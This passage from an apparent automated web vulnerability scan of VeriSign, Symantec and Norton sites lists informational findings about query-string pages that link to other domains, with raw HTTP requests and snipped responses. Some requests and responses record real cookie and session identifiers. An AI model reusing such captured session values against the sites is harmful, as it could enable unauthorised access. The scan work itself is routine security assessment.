HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:51 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Length: 42730 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.ch/"> Switzerland</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]...
14.18. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/mpki-for-ssl-support/index.html
Issue detail
The page was loaded from a URL containing a query string:https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html?tid=gnsupport The response contains the following links to other domains:https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://www.verisign.be/ https://www.verisign.ch/ https://www.verisign.de/ https://www.verisign.dk/ https://www.verisign.es/ https://www.verisign.fr/ https://www.verisign.in/ https://www.verisign.it/ https://www.verisign.se/ https://www.verisignchina.com.cn/
Request
GET /support/mpki-for-ssl-support/index.html?tid=gnsupport HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:45:45 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.ch/"> Switzerland</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]...
14.19. https://knowledge.verisign.com/support/mpki-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/mpki-support/index.html
Issue detail
The page was loaded from a URL containing a query string:https://knowledge.verisign.com/support/mpki-support/index.html?tid=gnsupport The response contains the following links to other domains:https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://www.verisign.be/ https://www.verisign.ch/ https://www.verisign.de/ https://www.verisign.dk/ https://www.verisign.es/ https://www.verisign.fr/ https://www.verisign.in/ https://www.verisign.it/ https://www.verisign.se/ https://www.verisignchina.com.cn/
Request
GET /support/mpki-support/index.html?tid=gnsupport HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:43 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.ch/"> Switzerland</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]...
14.20. https://knowledge.verisign.com/support/ssl-certificates-support/index
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/ssl-certificates-support/index
Issue detail
The page was loaded from a URL containing a query string:https://knowledge.verisign.com/support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false The response contains the following links to other domains:https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://www.verisign.be/ https://www.verisign.ch/ https://www.verisign.de/ https://www.verisign.dk/ https://www.verisign.es/ https://www.verisign.fr/ https://www.verisign.in/ https://www.verisign.it/ https://www.verisign.se/ https://www.verisignchina.com.cn/
Request
GET /support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:12 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Length: 46210 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.ch/"> Switzerland</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]...
14.21. https://knowledge.verisign.com/support/ssl-certificates-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/ssl-certificates-support/index.html
Issue detail
The page was loaded from a URL containing a query string:https://knowledge.verisign.com/support/ssl-certificates-support/index.html?tid=gnpsupport The response contains the following links to other domains:https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://www.verisign.be/ https://www.verisign.ch/ https://www.verisign.de/ https://www.verisign.dk/ https://www.verisign.es/ https://www.verisign.fr/ https://www.verisign.in/ https://www.verisign.it/ https://www.verisign.se/ https://www.verisignchina.com.cn/
Request
GET /support/ssl-certificates-support/index.html?tid=gnpsupport HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:03 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.ch/"> Switzerland</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]...
14.22. https://knowledge.verisign.com/support/trust-seal-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/trust-seal-support/index.html
Issue detail
The page was loaded from a URL containing a query string:https://knowledge.verisign.com/support/trust-seal-support/index.html?tid=gnpsupport The response contains the following links to other domains:https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://www.verisign.be/ https://www.verisign.ch/ https://www.verisign.de/ https://www.verisign.dk/ https://www.verisign.es/ https://www.verisign.fr/ https://www.verisign.in/ https://www.verisign.it/ https://www.verisign.se/ https://www.verisignchina.com.cn/
Request
GET /support/trust-seal-support/index.html?tid=gnpsupport HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:18 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.ch/"> Switzerland</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]...
14.23. https://onlinefamily.norton.com/familysafety/loginStart.fs
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://onlinefamily.norton.com
Path:
/familysafety/loginStart.fs
Issue detail
The page was loaded from a URL containing a query string:https://onlinefamily.norton.com/familysafety/loginStart.fs?inid=us_2010June_NOF The response contains the following links to other domains:https://www.facebook.com/norton?locale=en_US https://www.facebook.com/plugins/like.php?href=https%3A//www.facebook.com/norton&layout=button_count&show_faces=false&send=false&action=like&font&colorscheme=light&ref=NortonOnlineFamily&locale=en_US
Request
GET /familysafety/loginStart.fs?inid=us_2010June_NOF HTTP/1.1 Host: onlinefamily.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:45:55 GMT Server: Apache Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:55 GMT; Path=/ Set-Cookie: formVersion=1315604755623; Path=/ Set-Cookie: JSESSIONID=C487A83A71391D525794280EAF628915; Path=/familysafety Cache-Control: no-cache,no-store,must-revalidate,max-stale=0 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Connection: close Vary: Accept-Encoding Content-Length: 37906 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <...[SNIP]... <div id="norton-on-facebook" style="font-size:11px;"> <a href="https://www.facebook.com/norton?locale=en_US" style="color:#3B5998; font-size:11px; float:left;" target="_blank"> <strong>...[SNIP]... </div> <iframe src="https://www.facebook.com/plugins/like.php?href=https%3A//www.facebook.com/norton&layout=button_count&show_faces=false&send=false&action=like&font&colorscheme=light&ref=NortonOnlineFamily&locale=en_US" scrolling="no" frameborder="0" style="border:none; overflow:hidden; padding-top:5px; height:22px; width:150px;" allowTransparency="true"> </iframe>...[SNIP]...
14.24. http://player.ooyala.com/player.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://player.ooyala.com
Path:
/player.js
Issue detail
The page was loaded from a URL containing a query string:http://player.ooyala.com/player.js?callback=receiveOoyalaEvent&playerId=ooyalaPlayer_44h86_g6tvkk69&width=488&height=335&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&wmode=transparent The response contains the following link to another domain:http://www.adobe.com/go/getflash/
Request
GET /player.js?callback=receiveOoyalaEvent&playerId=ooyalaPlayer_44h86_g6tvkk69&width=488&height=335&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&wmode=transparent HTTP/1.1 Host: player.ooyala.com Proxy-Connection: keep-alive Referer: http://www.verisign.ch/corporate/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819
Response
HTTP/1.1 200 OK Last-Modified: Fri, 09 Sep 2011 21:25:08 GMT Content-Type: text/javascript; charset=utf-8 X-Ooyala-Server-Id: i-afd1a3c3 X-Pad: avoid browser bug Content-Length: 26306 Cache-Control: private, max-age=300 Date: Fri, 09 Sep 2011 21:26:10 GMT Connection: close Vary: Accept-Encoding (function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f...[SNIP]... <td align="center"><a href="http://www.adobe.com/go/getflash/" style="color:white"> <span style="font-size:12px">...[SNIP]...
14.25. http://query.verisign.com/search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://query.verisign.com
Path:
/search
Issue detail
The page was loaded from a URL containing a query string:http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend The response contains the following links to other domains:http://verisign.ch/assets/shared/images/sm_004276_oo.gif http://www.symantec.com/ http://www.verisign.be/ http://www.verisign.ch/ http://www.verisign.ch/code-signing/index.html http://www.verisign.ch/contact-information/index.html?tid=footer http://www.verisign.ch/corporate/index.html?tid=footer http://www.verisign.ch/legal-notices/index.html?tid=footer http://www.verisign.ch/privacy/index.html?tid=footer http://www.verisign.ch/repository/index.html?tid=footer http://www.verisign.ch/site-map/index.html?tid=footer http://www.verisign.ch/ssl/index.html http://www.verisign.ch/ssl/ssl-information-center/ev-ssl-certificate/index.html http://www.verisign.ch/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html http://www.verisign.ch/ssl/ssl-information-center/index.html http://www.verisign.ch/trust-seal/index.html http://www.verisign.ch/trust-seal/resources/malware-faq/index.html http://www.verisign.de/ http://www.verisign.dk/ http://www.verisign.es/ http://www.verisign.fr/ http://www.verisign.in/ http://www.verisign.it/ http://www.verisign.se/ http://www.verisignchina.com.cn/ https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
Request
GET /search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend HTTP/1.1 Host: query.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:07 GMT Server: saws Cache-Control: private Content-Type: text/html Vary: Accept-Encoding Content-Length: 52678 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=7"> <meta http-equiv="c...[SNIP]... <li><a href="http://www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="http://www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="http://www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="http://www.verisign.fr/"> France</a>...[SNIP]... <li><a href="http://www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="http://www.verisign.in/"> India</a>...[SNIP]... <li><a href="http://www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="http://www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="http://www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="http://www.verisign.ch/"> Switzerland</a>...[SNIP]... <noscript> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100"> <param name="movie" value="https://seal.verisign.com/getseal?at=1&sealid=2&dn=query.verisign.com&lang=en">...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <li><a href='//www.verisign.ch/contact-information/index.html?tid=footer'> Contact Us</a></li><li><a href='//www.verisign.ch/corporate/index.html?tid=footer'> About Us</a>...[SNIP]... <li><a href='//www.verisign.ch/legal-notices/index.html?tid=footer'> Legal Notices</a>...[SNIP]... <li><a href='//www.verisign.ch/privacy/index.html?tid=footer'> Privacy</a></li><li><a href='//www.verisign.ch/repository/index.html?tid=footer'> Repository</a>...[SNIP]... <li><a href='//www.verisign.ch/site-map/index.html?tid=footer'> Site Map</a>...[SNIP]... <a href='javascript:O_LC();'><img src='//verisign.ch/assets/shared/images/sm_004276_oo.gif' alt='Feedback' style='margin-right:5px;' /> Feedback</a>...[SNIP]... <p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'> Symantec Corp.</a> (NASDAQ: SYMC), provides solutions that allow companies and consumers to engage in communications and commerce online with confidence. VeriSign Authentication Services include <a href='//www.verisign.ch/ssl/ssl-information-center/index.html'> SSL</a>, <a href='//www.verisign.ch/ssl/index.html'> SSL Certificates</a>, <a href='//www.verisign.ch/ssl/ssl-information-center/ev-ssl-certificate/index.html'> Extended Validation</a> (<a href='//www.verisign.ch/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html'> EV SSL</a>), <a href='//www.verisign.ch/trust-seal/index.html'> VeriSign Trust Seal</a>...[SNIP]... </a>, <a href='//www.verisign.ch/trust-seal/resources/malware-faq/index.html'> malware scan</a>, <a href='//www.verisign.ch/code-signing/index.html'> code signing</a>...[SNIP]...
14.26. http://searchg.symantec.com/search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://searchg.symantec.com
Path:
/search
Issue detail
The page was loaded from a URL containing a query string:http://searchg.symantec.com/search?as_sitesearch=www.symantec.com/connect/blogs&q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0&ie=UTF-8&ip=50.23.123.106&access=p&sort=date:D:L:d1&entqr=0&entsp=a&oe=UTF-8&ud=1 The response contains the following link to another domain:http://community.norton.com/t5/Norton-Protection-Blog/bg-p/npb1
Request
GET /search?as_sitesearch=www.symantec.com/connect/blogs&q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0&ie=UTF-8&ip=50.23.123.106&access=p&sort=date:D:L:d1&entqr=0&entsp=a&oe=UTF-8&ud=1 HTTP/1.1 Host: searchg.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://searchg.symantec.com/search?q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0 Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622035736-New%7C1336358035736%3B%20event69%3Devent69%7C1336358035737%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:34:03 GMT Server: saws Cache-Control: private Content-Type: text/html x-content-type-options: nosniff Vary: Accept-Encoding Content-Length: 36924 Connection: close <html><head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <script language="javascript" type="text/javascript" src="http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en...[SNIP]... <b><a onclick="TrackSSOB(this, 'symsugg')" href="http://community.norton.com/t5/Norton-Protection-Blog/bg-p/npb1"> Norton Protection Weblog<br>...[SNIP]...
14.27. https://securitycenter.verisign.com/celp/enroll/outsideSearch
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://securitycenter.verisign.com
Path:
/celp/enroll/outsideSearch
Issue detail
The page was loaded from a URL containing a query string:https://securitycenter.verisign.com/celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP The response contains the following link to another domain:https://ssl.google-analytics.com/urchin.js
Request
GET /celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP HTTP/1.1 Host: securitycenter.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:46:33 GMT Content-type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=OqJ5OZYQ2WaOK1XBACbZvE969n6D9cN3GA67zeaCICg9DN3y5YkW!-1800460983; path=/ Connection: close <html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <title> Search for SSL or Code Signing Certificates from VeriSig...[SNIP]... <body aLink=#000000 bgColor=#ffffff class=bgWht leftMargin=0 link=#000000 topMargin=0 vLink=#000000 marginheight="0" marginwidth="0" onLoad="focus()"><script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"> </script>...[SNIP]...
14.28. http://shop.symantecstore.com/store/symnahho/ContentTheme/pbPage.GreenPCServiceSoftSell/ThemeID.664200
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://shop.symantecstore.com
Path:
/store/symnahho/ContentTheme/pbPage.GreenPCServiceSoftSell/ThemeID.664200
Issue detail
The page was loaded from a URL containing a query string:http://shop.symantecstore.com/store/symnahho/ContentTheme/pbPage.GreenPCServiceSoftSell/ThemeID.664200?inid=us_hhobanner_norton_greenpc The response contains the following link to another domain:http://buy.norton.com/domain_migration?inid=us_hhobanner_norton_greenpc
Request
GET /store/symnahho/ContentTheme/pbPage.GreenPCServiceSoftSell/ThemeID.664200?inid=us_hhobanner_norton_greenpc HTTP/1.1 Host: shop.symantecstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:46:40 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a Location: http://buy.norton.com/domain_migration?inid=us_hhobanner_norton_greenpc Content-Length: 279 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hhobanner_norton_greenpc"> here</a>...[SNIP]...
14.29. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.106300/pbPage.HolidayGiftGuide09/API1=SymCom/API2=Acq
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://shop.symantecstore.com
Path:
/store/symnahho/en_US/ContentTheme/ThemeID.106300/pbPage.HolidayGiftGuide09/API1=SymCom/API2=Acq
Issue detail
The page was loaded from a URL containing a query string:http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.106300/pbPage.HolidayGiftGuide09/API1=SymCom/API2=Acq?inid=us_hhobanner_nortongiftguide2008 The response contains the following link to another domain:http://buy.norton.com/domain_migration?inid=us_hhobanner_nortongiftguide2008
Request
GET /store/symnahho/en_US/ContentTheme/ThemeID.106300/pbPage.HolidayGiftGuide09/API1=SymCom/API2=Acq?inid=us_hhobanner_nortongiftguide2008 HTTP/1.1 Host: shop.symantecstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:46:39 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a Location: http://buy.norton.com/domain_migration?inid=us_hhobanner_nortongiftguide2008 Content-Length: 284 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hhobanner_nortongiftguide2008"> here</a>...[SNIP]...
14.30. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1312100/pbPage.EarthDay09Norton/pgm.23674300/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://shop.symantecstore.com
Path:
/store/symnahho/en_US/ContentTheme/ThemeID.1312100/pbPage.EarthDay09Norton/pgm.23674300/
Issue detail
The page was loaded from a URL containing a query string:http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1312100/pbPage.EarthDay09Norton/pgm.23674300/?inid=us_hhobanner_earth_day The response contains the following link to another domain:http://buy.norton.com/domain_migration?inid=us_hhobanner_earth_day
Request
GET /store/symnahho/en_US/ContentTheme/ThemeID.1312100/pbPage.EarthDay09Norton/pgm.23674300/?inid=us_hhobanner_earth_day HTTP/1.1 Host: shop.symantecstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
